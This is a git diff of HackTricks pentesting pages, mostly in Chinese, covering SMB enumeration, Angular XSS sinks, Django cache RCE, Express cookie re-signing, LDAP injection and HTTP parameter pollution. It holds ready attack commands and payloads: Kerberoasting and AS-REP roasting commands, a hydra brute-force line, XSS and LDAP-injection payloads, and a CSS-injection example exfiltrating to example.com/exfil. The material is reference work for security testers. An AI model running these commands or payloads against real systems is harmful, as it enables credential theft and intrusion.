GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```
{{#include ../banners/hacktricks-training.md}}

80
src/network-services-pentesting/pentesting-web/angular.md
View File

@ -1,16 +1,18 @@
# Angular
{{#include /banners/hacktricks-training.md}}
## The Checklist
Checklist [from here](https://lsgeurope.com/post/angular-security-checklist).
* [ ] Angular被视为客户端框架不期望提供服务器端保护
* [ ] Angular被视为一个客户端框架,不期望提供服务器端保护
* [ ] 项目配置中禁用了脚本的源映射
* [ ] 不可信的用户输入在用于模板之前始终被插值或清理
* [ ] 用户无法控制服务器端或客户端模板
* [ ] 不可信的用户输入在被应用程序信任之前,使用适当的安全上下文进行清理
* [ ] 不使用不可信输入的`BypassSecurity*`方法
* [ ] 不可信的用户输入不传递给Angular类`ElementRef``Renderer2``Document`或其他JQuery/DOM接收器
* [ ] `BypassSecurity*` 方法不与不可信输入一起使用
* [ ] 不可信的用户输入不传递给Angular类 `ElementRef``Renderer2` `Document`或其他JQuery/DOM接收器
## What is Angular
@ -45,7 +47,7 @@ Angular NgModules 声明一个编译上下文,用于一组专用于应用程
Angular `Router` NgModule 提供一个服务,让您可以在应用程序的不同状态和视图层次结构之间定义导航路径。`RouterModule``app-routing.module.ts` 文件中定义。
对于不与特定视图相关联的数据或逻辑,并希望在组件之间共享的,您可以创建一个服务类。服务类定义前面会有 `@Injectable()` 装饰器。该装饰器提供元数据,允许其他提供者作为依赖项注入到您的类中。依赖注入 (DI) 使您能够保持组件类的精简和高效。它们不会从服务器获取数据、验证用户输入或直接记录到控制台;它们将此类任务委托给服务。
对于不与特定视图相关联且希望在组件之间共享的数据或逻辑,您可以创建一个服务类。服务类定义前面会有 `@Injectable()` 装饰器。该装饰器提供元数据,允许其他提供者作为依赖项注入到您的类中。依赖注入 (DI) 使您能够保持组件类的精简和高效。它们不会从服务器获取数据、验证用户输入或直接记录到控制台;它们将此类任务委托给服务。
## Sourcemap 配置
@ -58,30 +60,30 @@ Angular 框架通过遵循 `tsconfig.json` 选项将 TypeScript 文件转换为
"hidden": false
}
```
一般来说sourcemap 文件用于调试目的,因为它们将生成的文件映射到其原始文件。因此,不建议在生产环境中使用它们。如果启用 sourcemaps它可以提高可读性并通过复制 Angular 项目的原始状态来帮助文件分析。然而,如果它们被禁用,审查者仍然可以通过搜索反安全模式手动分析编译后的 JavaScript 文件。
一般来说sourcemap 文件用于调试目的,因为它们将生成的文件映射到其原始文件。因此,不建议在生产环境中使用它们。如果启用 sourcemaps它可以提高可读性并通过复制 Angular 项目的原始状态来帮助文件分析。然而,如果它们被禁用,审查者仍然可以通过搜索反安全模式手动分析编译后的 JavaScript 文件。
此外,带有 Angular 项目的编译 JavaScript 文件可以在浏览器开发者工具 → Sources或 Debugger 和 Sources→ \[id].main.js 中找到。根据启用的选项,该文件末尾可能包含以下行 `//# sourceMappingURL=[id].main.js.map`,或者如果 **hidden** 选项设置为 **true**,则可能不包含。然而,如果 **scripts** 的 sourcemap 被禁用测试变得更加复杂我们无法获取该文件。此外sourcemap 可以在项目构建期间启用,例如 `ng build --source-map`
## 数据绑定
绑定是指组件与其对应视图之间的通信过程。它用于在 Angular 框架中传输数据。数据可以通过多种方式传递,例如通过事件、插值、属性或通过双向绑定机制。此外,数据还可以在相关组件(父子关系)之间以及在两个不相关的组件之间使用服务功能共享。
绑定是指组件与其对应视图之间的通信过程。它用于在 Angular 框架中传输数据。数据可以通过多种方式传递,例如通过事件、插值、属性或通过双向绑定机制。此外,数据还可以在相关组件(父子关系)之间以及在两个不相关的组件之间使用服务功能进行共享。
我们可以按数据流对绑定进行分类:
* 数据源到视图目标(包括 _interpolation_、_properties_、_attributes_、_classes_ 和 _styles_);可以通过在模板中使用 `[]``{{}}` 应用;
* 视图目标到数据源(包括 _events_);可以通过在模板中使用 `()` 应用;
* 双向;可以通过在模板中使用 `[()]` 应用。
* 数据源到视图目标(包括 _interpolation_、_properties_、_attributes_、_classes_ 和 _styles_);可以通过在模板中使用 `[]``{{}}` 应用;
* 视图目标到数据源(包括 _events_);可以通过在模板中使用 `()` 应用;
* 双向;可以通过在模板中使用 `[()]` 应用。
绑定可以在属性、事件和属性上调用,以及在源指令的任何公共成员上调用:
| 类型 | 目标 | 示例 |
| --------- | -------------------------------------------------------- | -------------------------------------------------------------------- |
| 属性 | 元素属性、组件属性、指令属性 | \<img \[alt]="hero.name" \[src]="heroImageUrl"> |
| 事件 | 元素事件、组件事件、指令事件 | \<button type="button" (click)="onSave()">保存 |
| 双向 | 事件和属性 | \<input \[(ngModel)]="name"> |
| 属性 | 属性(例外) | \<button type="button" \[attr.aria-label]="help">帮助 |
| 类 | 类属性 | \<div \[class.special]="isSpecial">特殊 |
| 样式 | 样式属性 | \<button type="button" \[style.color]="isSpecial ? 'red' : 'green'"> |
| --------- | ------------------------------------------------------ | ------------------------------------------------------------------ |
| 属性 | 元素属性、组件属性、指令属性 | \<img \[alt]="hero.name" \[src]="heroImageUrl"> |
| 事件 | 元素事件、组件事件、指令事件 | \<button type="button" (click)="onSave()">Save |
| 双向 | 事件和属性 | \<input \[(ngModel)]="name"> |
| 属性 | 属性(例外) | \<button type="button" \[attr.aria-label]="help">help |
| 类 | 类属性 | \<div \[class.special]="isSpecial">Special |
| 样式 | 样式属性 | \<button type="button" \[style.color]="isSpecial ? 'red' : 'green'"> |
## Angular 安全模型
@ -132,10 +134,10 @@ Angular 引入了一系列方法来绕过其默认的清理过程,并指示某
this.trustedUrl = this.sanitizer.bypassSecurityTrustUrl('javascript:alert()');
//app.component.html
<a class="e2e-trusted-url" [href]="trustedUrl">点击我</a>
<a class="e2e-trusted-url" [href]="trustedUrl">Click me</a>
//结果
<a _ngcontent-pqg-c12="" class="e2e-trusted-url" href="javascript:alert()">点击我</a>
//result
<a _ngcontent-pqg-c12="" class="e2e-trusted-url" href="javascript:alert()">Click me</a>
```
2. `bypassSecurityTrustResourceUrl` 用于指示给定值是安全的资源 URL
@ -146,7 +148,7 @@ this.trustedResourceUrl = this.sanitizer.bypassSecurityTrustResourceUrl("https:/
//app.component.html
<iframe [src]="trustedResourceUrl"></iframe>
//结果
//result
<img _ngcontent-nre-c12="" src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_light_color_272x92dp.png">
```
3. `bypassSecurityTrustHtml` 用于指示给定值是安全的 HTML。请注意以这种方式将 `script` 元素插入 DOM 树不会导致它们执行所包含的 JavaScript 代码,因为这些元素是如何添加到 DOM 树中的。
@ -158,7 +160,7 @@ this.trustedHtml = this.sanitizer.bypassSecurityTrustHtml("<h1>html tag</h1><svg
//app.component.html
<p style="border:solid" [innerHtml]="trustedHtml"></p>
//结果
//result
<h1>html tag</h1>
<svg onclick="alert('bypassSecurityTrustHtml')" style="display:block">blah</svg>
```
@ -171,7 +173,7 @@ this.trustedScript = this.sanitizer.bypassSecurityTrustScript("alert('bypass Sec
//app.component.html
<script [innerHtml]="trustedScript"></script>
//结果
//result
-
```
5. `bypassSecurityTrustStyle` 用于指示给定值是安全的 CSS。以下示例说明了 CSS 注入:
@ -183,15 +185,15 @@ this.trustedStyle = this.sanitizer.bypassSecurityTrustStyle('background-image: u
//app.component.html
<input type="password" name="pwd" value="01234" [style]="trustedStyle">
//结果
请求 URL: GET example.com/exfil/a
//result
Request URL: GET example.com/exfil/a
```
Angular 提供了一个 `sanitize` 方法,在将数据显示在视图中之前对其进行清理。此方法使用提供的安全上下文并相应地清理输入。然而,使用特定数据和上下文的正确安全上下文至关重要。例如,在 HTML 内容上应用带有 `SecurityContext.URL` 的清理器并不能提供对危险 HTML 值的保护。在这种情况下,错误使用安全上下文可能导致 XSS 漏洞。
Angular 提供了一个 `sanitize` 方法来在视图中显示数据之前对其进行清理。此方法使用提供的安全上下文并相应地清理输入。然而,使用特定数据和上下文的正确安全上下文至关重要。例如,在 HTML 内容上应用带有 `SecurityContext.URL` 的清理器并不能提供对危险 HTML 值的保护。在这种情况下,错误使用安全上下文可能导致 XSS 漏洞。
### HTML 注入
当用户输入绑定到以下三个属性中的任何一个时,就会发生此漏洞:`innerHTML``outerHTML``iframe` `srcdoc`。虽然绑定到这些属性会按原样解释 HTML但输入使用 `SecurityContext.HTML` 进行清理。因此HTML 注入是可能的但跨站脚本XSS则不是。
当用户输入绑定到以下三个属性中的任何一个时,就会发生此漏洞: `innerHTML``outerHTML``iframe` `srcdoc`。虽然绑定到这些属性会按原样解释 HTML但输入使用 `SecurityContext.HTML` 进行清理。因此HTML 注入是可能的但跨站脚本XSS则不是。
使用 `innerHTML` 的示例:
```jsx
@ -216,7 +218,7 @@ test = "<script>alert(1)</script><h1>test</h1>";
#### 客户端渲染 (CSR)
Angular 利用模板动态构建页面。该方法涉及将模板表达式用双大括号 (`{{}}`) 包围,以便 Angular 进行评估。通过这种方式,框架提供了额外的功能。例如,模板 `{{1+1}}` 将显示为 2。
Angular 利用模板动态构建页面。该方法涉及将模板表达式用双大括号`{{}}`)括起来,以便 Angular 进行评估。通过这种方式,框架提供了额外的功能。例如,像 `{{1+1}}` 这样的模板将显示为 2。
通常Angular 会转义可能与模板表达式混淆的用户输入(例如,字符如 \`< > ' " \`\)。这意味着需要额外的步骤来绕过此限制,例如利用生成 JavaScript 字符串对象的函数,以避免使用黑名单字符。然而,要实现这一点,我们必须考虑 Angular 的上下文、属性和变量。因此,模板注入攻击可能如下所示:
```jsx
@ -231,7 +233,7 @@ template: '<h1>title</h1>' + _userInput
#### 服务器端渲染 (SSR)
与在浏览器的DOM中发生的CSR不同Angular Universal负责模板文件的SSR。这些文件随后被传递给用户。尽管有这种区别Angular Universal仍然应用与CSR相同的清理机制来增强SSR的安全性。SSR中的模板注入漏洞可以以与CSR相同的方式被发现,因为使用的模板语言是相同的。
与在浏览器的DOM中发生的CSR不同Angular Universal负责模板文件的SSR。这些文件随后被传递给用户。尽管有这种区别Angular Universal仍然应用与CSR相同的清理机制以增强SSR的安全性。在SSR中发现模板注入漏洞的方法与CSR相同,因为使用的模板语言是相同的。
当然在使用第三方模板引擎如Pug和Handlebars时也有可能引入新的模板注入漏洞。
@ -315,7 +317,7 @@ this.elementRef.nativeElement.appendChild(s);
}
}
```
* 尽管 `Renderer2` 提供的 API 可以安全使用,即使在不支持直接访问本地元素的情况下,它仍然存在一些安全缺陷。使用 `Renderer2`,可以使用 `setAttribute()` 方法在 HTML 元素上设置属性,该方法没有 XSS 预防机制。
* 尽管 `Renderer2` 提供的 API 可以安全使用,即使在不支持直接访问本地元素的情况下,它仍然存在一些安全缺陷。使用 `Renderer2`,可以通过 `setAttribute()` 方法在 HTML 元素上设置属性,该方法没有 XSS 预防机制。
```tsx
//app.component.ts
@ -371,13 +373,13 @@ this.renderer2.setProperty(this.img.nativeElement, 'innerHTML', '<img src=1 oner
<button (click)="setProperty()">Click me!</button>
```
在我们的研究中,我们还检查了其他 `Renderer2` 方法的行为,`setStyle()``createComment()``setValue()`,与 XSS 和 CSS 注入的关系。然而,由于它们的功能限制,我们未能找到这些方法的有效攻击向量。
在我们的研究中,我们还检查了其他 `Renderer2` 方法的行为,如 `setStyle()``createComment()``setValue()`,与 XSS 和 CSS 注入的关系。然而,由于它们的功能限制,我们未能找到这些方法的有效攻击向量。
#### jQuery
jQuery 是一个快速、小巧且功能丰富的 JavaScript 库,可以在 Angular 项目中用于操作 HTML DOM 对象。然而,众所周知,该库的方法可能被利用以实现 XSS 漏洞。为了讨论一些易受攻击的 jQuery 方法如何在 Angular 项目中被利用,我们添加了这一小节。
jQuery 是一个快速、小巧且功能丰富的 JavaScript 库,可以在 Angular 项目中用于帮助操作 HTML DOM 对象。然而,众所周知,该库的方法可能被利用以实现 XSS 漏洞。为了讨论一些易受攻击的 jQuery 方法如何在 Angular 项目中被利用,我们添加了这一小节。
* `html()` 方法获取匹配元素集合中第一个元素的 HTML 内容,或设置每个匹配元素的 HTML 内容。然而,按设计,任何接受 HTML 字符串的 jQuery 构造函数或方法都可能执行代码。这可能通过注入 `<script>` 标签或使用执行代码的 HTML 属性来发生,如例所示。
* `html()` 方法获取匹配元素集合中第一个元素的 HTML 内容,或设置每个匹配元素的 HTML 内容。然而,按设计,任何接受 HTML 字符串的 jQuery 构造函数或方法都可能执行代码。这可能通过注入 `<script>` 标签或使用执行代码的 HTML 属性来发生,如例所示。
```tsx
//app.component.ts
@ -410,7 +412,7 @@ $("p").html("<script>alert(1)</script>");
jQuery.parseHTML(data [, context ] [, keepScripts ])
```
如前所述,大多数接受 HTML 字符串的 jQuery API 将运行包含在 HTML 中的脚本。`jQuery.parseHTML()` 方法不会运行解析 HTML 中的脚本,除非 `keepScripts` 显式为 `true`。然而,在大多数环境中,仍然可以间接执行脚本;例如,通过 `<img onerror>` 属性。
如前所述,大多数接受 HTML 字符串的 jQuery API 将运行包含在 HTML 中的脚本。`jQuery.parseHTML()` 方法不会在解析的 HTML 中运行脚本,除非 `keepScripts` 显式为 `true`。然而,在大多数环境中,仍然可以间接执行脚本;例如,通过 `<img onerror>` 属性。
```tsx
//app.component.ts
@ -450,7 +452,7 @@ $palias.append(html);
* `window.location.href`(和 `document.location.href`
获取当前 DOM 位置对象的规范方法是使用 `window.location`。它也可以用于将浏览器重定向到新页面。因此,控制对象使我们能够利用开放重定向漏洞。
获取当前 DOM 位置对象的规范方法是使用 `window.location`。它也可以用于将浏览器重定向到新页面。因此,控制对象使我们能够利用开放重定向漏洞。
```tsx
//app.component.ts
@ -468,7 +470,7 @@ window.location.href = "https://google.com/about"
以下场景的利用过程是相同的。
* `window.location.assign()`(和 `document.location.assign()`
此方法使窗口加载并显示指定 URL 的文档。如果我们控制此方法,它可能是开放重定向攻击的一个入口。
此方法使窗口加载并显示指定 URL 的文档。如果我们控制此方法,它可能成为开放重定向攻击的一个出口。
```tsx
//app.component.ts
@ -496,7 +498,7 @@ window.location.replace("http://google.com/about")
```
* `window.open()`
`window.open()` 方法接受一个 URL并将其识的资源加载到新标签或现有标签中。控制此方法也可能是触发 XSS 或开放重定向漏洞的机会。
`window.open()` 方法接受一个 URL并将其识的资源加载到新标签或现有标签中。控制此方法也可能是触发 XSS 或开放重定向漏洞的机会。
```tsx
//app.component.ts
@ -510,7 +512,7 @@ window.open("https://google.com/about", "_blank")
#### Angular 类
* 根据 Angular 文档Angular `Document` 与 DOM 文档相同,这意味着可以使用常见的向量来利用 Angular 中的客户端漏洞。`Document.location` 属性和方法可能是成功开放重定向攻击的入口,如下例所示:
* 根据 Angular 文档Angular `Document` 与 DOM 文档相同,这意味着可以使用常见的向量来利用 Angular 中的客户端漏洞。`Document.location` 属性和方法可能是成功开放重定向攻击的出口,如示例所示:
```tsx
//app.component.ts
@ -601,3 +603,7 @@ this.router.navigateByUrl('URL')
* [Angular Document](https://angular.io/api/common/DOCUMENT)
* [Angular Location](https://angular.io/api/common/Location)
* [Angular Router](https://angular.io/api/router/Router)
{{#include /banners/hacktricks-training.md}}

6
src/network-services-pentesting/pentesting-web/django.md
View File

@ -1,8 +1,12 @@
# Django
{{#include /banners/hacktricks-training.md}}
## 缓存操控导致RCE
Django的默认缓存存储方法是[Python pickles](https://docs.python.org/3/library/pickle.html),如果[不受信任的输入被反序列化](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf)可能导致RCE。**如果攻击者能够获得对缓存的写入访问权限他们可以将此漏洞升级为底层服务器上的RCE**。
Django缓存存储在四个地方之一[Redis](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/redis.py#L12)、[内存](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/locmem.py#L16)、[文件](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/filebased.py#L16)或[数据库](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/db.py#L95)。存储在Redis服务器或数据库中的缓存是最可能的攻击向量Redis注入和SQL注入但攻击者也可能利用基于文件的缓存将任意写入转化为RCE。维护者已将此标记为非问题。需要注意的是缓存文件夹、SQL表名和Redis服务器的详细信息将根据实现而有所不同。
此HackerOne报告提供了一个很好的、可复现的利用Django缓存存储在SQLite数据库中的示例https://hackerone.com/reports/1415436
此HackerOne报告提供了一个很好的、可重现的利用Django缓存存储在SQLite数据库中的示例https://hackerone.com/reports/1415436
{{#include /banners/hacktricks-training.md}}

1
src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md
View File

@ -1 +0,0 @@
# GWT - 谷歌网络工具包

6
src/network-services-pentesting/pentesting-web/nodejs-express.md
View File

@ -1,10 +1,12 @@
# NodeJS Express
{{#include /banners/hacktricks-training.md}}
## Cookie Signature
该工具 [https://github.com/DigitalInterruption/cookie-monster](https://github.com/DigitalInterruption/cookie-monster) 是一个用于自动化测试和重新签名 Express.js cookie 秘密的实用程序。
### 具有特定名称的单个 cookie
### Single cookie with a specific name
```bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session
```
@ -26,4 +28,4 @@ cookie-monster -b -f cookies.json -w custom.lst
```bash
cookie-monster -e -f new_cookie.json -k secret
```
{{#include /banners/hacktricks-training.md}}

121
src/online-platforms-with-api.md
View File

@ -1,121 +0,0 @@
{{#include ./banners/hacktricks-training.md}}
# [ProjectHoneypot](https://www.projecthoneypot.org/)
您可以询问某个IP是否与可疑/恶意活动相关。完全免费。
# [**BotScout**](http://botscout.com/api.htm)
检查IP地址是否与注册账户的机器人相关。还可以检查用户名和电子邮件。最初免费。
# [Hunter](https://hunter.io/)
查找和验证电子邮件。
一些API请求免费更多需要付费。
商业?
# [AlientVault](https://otx.alienvault.com/api)
查找与IP和域名相关的恶意活动。免费。
# [Clearbit](https://dashboard.clearbit.com/)
查找与电子邮件(其他平台上的个人资料)、域名(基本公司信息、邮件和工作的人)和公司(从邮件获取公司信息)相关的个人数据。
您需要付费才能访问所有可能性。
商业?
# [BuiltWith](https://builtwith.com/)
网站使用的技术。昂贵...
商业?
# [Fraudguard](https://fraudguard.io/)
检查主机域名或IP是否与可疑/恶意活动相关。有一些免费API访问。
商业?
# [FortiGuard](https://fortiguard.com/)
检查主机域名或IP是否与可疑/恶意活动相关。有一些免费API访问。
# [SpamCop](https://www.spamcop.net/)
指示主机是否与垃圾邮件活动相关。有一些免费API访问。
# [mywot](https://www.mywot.com/)
基于意见和其他指标判断域名是否与可疑/恶意信息相关。
# [ipinfo](https://ipinfo.io/)
获取IP地址的基本信息。您每月可以测试最多100K。
# [securitytrails](https://securitytrails.com/app/account)
该平台提供有关域名和IP地址的信息例如IP或域名服务器内的域名、由电子邮件拥有的域名查找相关域名、域名的IP历史查找CloudFlare背后的主机、使用某个名称服务器的所有域名...
您有一些免费访问。
# [fullcontact](https://www.fullcontact.com/)
允许按电子邮件、域名或公司名称搜索并检索相关的“个人”信息。还可以验证电子邮件。有一些免费访问。
# [RiskIQ](https://www.spiderfoot.net/documentation/)
即使在免费/社区版本中也有大量来自域名和IP的信息。
# [\_IntelligenceX](https://intelx.io/)
搜索域名、IP和电子邮件并从泄露中获取信息。有一些免费访问。
# [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com/)
按IP搜索并收集与可疑活动相关的信息。有一些免费访问。
# [Greynoise](https://viz.greynoise.io/)
按IP或IP范围搜索并获取有关扫描互联网的IP的信息。15天免费访问。
# [Shodan](https://www.shodan.io/)
获取IP地址的扫描信息。有一些免费API访问。
# [Censys](https://censys.io/)
与shodan非常相似
# [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/)
通过关键字查找开放的S3桶。
# [Dehashed](https://www.dehashed.com/data)
查找电子邮件甚至域名的泄露凭据
商业?
# [psbdmp](https://psbdmp.ws/)
搜索电子邮件出现的pastebins。商业
# [emailrep.io](https://emailrep.io/key)
获取邮件的声誉。商业?
# [ghostproject](https://ghostproject.fr/)
从泄露的电子邮件中获取密码。商业?
# [Binaryedge](https://www.binaryedge.io/)
从IP获取有趣的信息
# [haveibeenpwned](https://haveibeenpwned.com/)
按域名和电子邮件搜索,查看是否被攻破及密码。商业?
[https://dnsdumpster.com/](https://dnsdumpster.com/)(在商业工具中?)
[https://www.netcraft.com/](https://www.netcraft.com/)(在商业工具中?)
[https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/)(在商业工具中?)
{{#include ./banners/hacktricks-training.md}}

41
src/other-web-tricks.md
View File

@ -1,41 +0,0 @@
# 其他网络技巧
{{#include ./banners/hacktricks-training.md}}
### Host header
几次后端信任 **Host header** 来执行某些操作。例如,它可以使用其值作为 **发送密码重置的域**。因此,当您收到一封包含重置密码链接的电子邮件时,使用的域是您在 Host header 中输入的域。然后,您可以请求其他用户的密码重置,并将域更改为您控制的域,以窃取他们的密码重置代码。 [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2)。
> [!WARNING]
> 请注意,您甚至可能不需要等待用户点击重置密码链接来获取令牌,因为 **垃圾邮件过滤器或其他中介设备/机器人可能会点击它进行分析**
### Session booleans
有时,当您正确完成某些验证时,后端会 **仅将值为 "True" 的布尔值添加到您的会话的安全属性中**。然后,另一个端点将知道您是否成功通过了该检查。\
然而,如果您 **通过了检查**,并且您的会话在安全属性中获得了 "True" 值,您可以尝试 **访问其他资源**,这些资源 **依赖于相同的属性**,但您 **不应该有权限** 访问。 [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a)。
### 注册功能
尝试以已存在用户的身份注册。还可以尝试使用等效字符(点、多个空格和 Unicode
### 接管电子邮件
注册一个电子邮件,在确认之前更改电子邮件,然后,如果新的确认电子邮件发送到第一个注册的电子邮件,您可以接管任何电子邮件。或者,如果您可以启用第二个电子邮件以确认第一个电子邮件,您也可以接管任何帐户。
### 访问使用 atlassian 的公司内部服务台
{{#ref}}
https://yourcompanyname.atlassian.net/servicedesk/customer/user/login
{{#endref}}
### TRACE 方法
开发人员可能会忘记在生产环境中禁用各种调试选项。例如HTTP `TRACE` 方法是为诊断目的而设计的。如果启用web 服务器将通过在响应中回显收到的确切请求来响应使用 `TRACE` 方法的请求。这种行为通常是无害的,但偶尔会导致信息泄露,例如可能由反向代理附加到请求的内部身份验证头的名称。![Image for post](https://miro.medium.com/max/60/1*wDFRADTOd9Tj63xucenvAA.png?q=20)
![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png)
{{#include ./banners/hacktricks-training.md}}
### Same-Site Scripting
当我们遇到由于某些 DNS 配置错误而解析为 localhost 或 127.0.0.1 的域或子域时,就会发生这种情况。它允许攻击者绕过 RFC2109 (HTTP 状态管理机制) 的同源限制,从而劫持状态管理数据。它还可能允许跨站脚本攻击。您可以从 [这里](https://seclists.org/bugtraq/2008/Jan/270) 阅读更多信息。

9
src/pentesting-dns.md
View File

@ -1,9 +0,0 @@
{{#include ./banners/hacktricks-training.md}}
**进一步研究对DNS的攻击**
**DNSSEC和DNSSEC3**
**IPv6中的DNS**
{{#include ./banners/hacktricks-training.md}}

14
src/pentesting-web/ldap-injection.md
View File

@ -1,14 +1,12 @@
# LDAP 注入
## LDAP 注入
{{#include ../banners/hacktricks-training.md}}
## LDAP 注入
### **LDAP**
**如果你想了解什么是 LDAP请访问以下页面**
**如果你想知道什么是 LDAP请访问以下页面**
{{#ref}}
../network-services-pentesting/pentesting-ldap.md
@ -48,17 +46,17 @@ EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf
**发送过滤器时使用正确的语法非常重要,否则会抛出错误。最好只发送 1 个过滤器。**
过滤器必须以: `&``|` 开头\
示例: `(&(directory=val1)(folder=public))`
过滤器必须以:`&``|` 开头\
示例:`(&(directory=val1)(folder=public))`
`(&(objectClass=VALUE1)(type=Epson*))`\
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
然后: `(&(objectClass=`**`*)(ObjectClass=*))`** 将是第一个过滤器(被执行的那个)。
然后:`(&(objectClass=`**`*)(ObjectClass=*))`** 将是第一个过滤器(被执行的那个)。
### 登录绕过
LDAP 支持多种格式来存储密码明文、md5、smd5、sh1、sha、crypt。因此可能无论你在密码中插入什么,它都会被哈希处理。
LDAP 支持多种格式来存储密码明文、md5、smd5、sh1、sha、crypt。因此无论你在密码中插入什么,它都可能被哈希处理。
```bash
user=*
password=*
@ -182,7 +180,7 @@ if char == alphabet[-1]: #If last of all the chars, then, no more chars in the v
finish = True
print()
```
#### **特殊盲LDAP注入不带“\*”)**
#### **特殊盲LDAP注入不带“*”)**
```python
#!/usr/bin/python3

32
src/pentesting-web/parameter-pollution.md
View File

@ -1,12 +1,10 @@
# 参数污染 | JSON 注入
## 参数污染
{{#include ../banners/hacktricks-training.md}}
## HTTP 参数污染 (HPP) 概述
HTTP 参数污染 (HPP) 是一种技术,攻击者通过操纵 HTTP 参数来以意想不到的方式改变 Web 应用程序的行为。这种操纵是通过添加、修改或重复 HTTP 参数来完成的。这些操纵的效果对用户并不直接可见,但可以显著改变服务器端应用程序的功能,并在客户端产生可观察的影响。
HTTP 参数污染 (HPP) 是一种技术,攻击者通过操纵 HTTP 参数来改变 Web 应用程序的行为,导致意外的结果。这种操纵是通过添加、修改或重复 HTTP 参数来实现的。这些操纵的效果对用户并不直接可见,但可以显著改变应用程序在服务器端的功能,并在客户端产生可观察的影响。
### HTTP 参数污染 (HPP) 示例
@ -18,27 +16,27 @@ HTTP 参数污染 (HPP) 是一种技术,攻击者通过操纵 HTTP 参数来
- **操纵后的 URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000&from=accountC`
交易可能错误地计入 `accountC` 而不是 `accountA`,展示了 HPP 操纵交易或其他功能(如密码重置、2FA 设置或 API 密钥请求)的潜力。
交易可能错误地计入 `accountC` 而不是 `accountA`,展示了 HPP 操纵交易或其他功能(如密码重置、双因素认证设置或 API 密钥请求)的潜力。
#### **特定技术的参数解析**
- 参数的解析和优先级取决于底层 Web 技术,影响 HPP 的利用方式。
- 参数的解析和优先级取决于底层 Web 技术,影响 HPP 的利用方式。
- 像 [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/) 这样的工具有助于识别这些技术及其解析行为。
### PHP 和 HPP 利用
**OTP 操纵案例:**
**一次性密码 (OTP) 操作案例:**
- **背景:** 一个需要一次性密码 (OTP) 的登录机制被利用。
- **方法:** 通过使用 Burp Suite 等工具拦截 OTP 请求,攻击者在 HTTP 请求中重复了 `email` 参数。
- **结果:** 本应发送到初始电子邮件的 OTP 被发送到操纵请求中指定的第二个电子邮件地址。这个缺陷允许通过绕过预期的安全措施获得未授权访问
- **结果:** 本应发送到初始电子邮件的 OTP 被发送到操纵请求中指定的第二个电子邮件地址。这个缺陷允许未经授权的访问,绕过了预期的安全措施
这个场景突显了应用程序后端的一个关键疏漏,该后端处理第一个 `email` 参数以生成 OTP但使用最后一个进行发送。
这个场景突显了应用程序后端的一个关键疏漏,该后端处理第一个 `email` 参数以生成 OTP但使用最后一个参数进行发送。
**API 密钥操案例:**
**API 密钥操案例:**
- **场景:** 一个应用程序允许用户通过个人资料设置页面更新他们的 API 密钥。
- **攻击向量:** 攻击者发现通过向 POST 请求附加一个额外的 `api_key` 参数,可以操纵 API 密钥更新功能的结果。
- **攻击向量:** 攻击者发现通过在 POST 请求中附加一个额外的 `api_key` 参数,可以操纵 API 密钥更新功能的结果。
- **技术:** 利用像 Burp Suite 这样的工具,攻击者构造一个包含两个 `api_key` 参数的请求:一个合法的和一个恶意的。服务器只处理最后一个出现的参数,将 API 密钥更新为攻击者提供的值。
- **结果:** 攻击者控制了受害者的 API 功能,可能未经授权访问或修改私有数据。
